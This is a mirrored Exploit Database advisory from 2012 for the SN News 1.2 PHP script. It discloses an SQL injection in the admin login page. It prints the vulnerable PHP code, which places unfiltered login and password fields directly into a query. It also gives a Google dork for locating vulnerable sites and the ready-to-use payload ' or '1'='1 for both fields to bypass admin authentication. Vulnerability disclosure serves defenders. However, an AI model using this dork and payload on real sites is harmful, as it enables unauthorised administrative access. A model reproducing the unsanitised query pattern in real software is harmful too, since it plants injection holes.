SN News 1.2 – ‘/admin/loger.php’ Authentication Bypass

• Exploit Database
• 40 阅读

• 作者： Yakir Wizman
  日期： 2012-06-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19005/

• ##############################################################################
  ## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
  ## Google Dork: "snews/visualiza.php?id="
  ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
  ## Date: 06/06/2012
  ## Version: 1.2
  ## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
  ## ISRAEL
  ##############################################################################
  ##Author will be not responsible for any damage.
  ##############################################################################
  ## Vulnerable Code - /admin/logar.php [4-15]:
  4.$login = $_POST["login"];
  5.$senha = $_POST["senha"];
  6.$sql = "select * from news_adm where login='$login' AND senha='$senha'";
  7.$query = mysql_query($sql);
  8.$nr= mysql_num_rows($query);
  9.if($nr>0){
  10.$_SESSION["admin"] = "on";
  11.echo "<script>
  12.location.href='https://www.exploit-db.com/exploits/'
  13.</script>
  14.";
  15.}
  ## NOTE:
  ## As you can see there is no validation or any filter to variables $login and $senha.
  ## See line 6, so you can inject sql query by using $login and $senha variables.
  ## SQL Injection PoC:
  ## http://127.0.0.1/sn_news/admin/login.htm
  ## Login: ' or '1'='1
  ## Senha: ' or '1'='1
  ## This injection will bypass the admin login screen.
  ##############################################################################
  # Cya :)
  # 0x31337.net
  ##############################################################################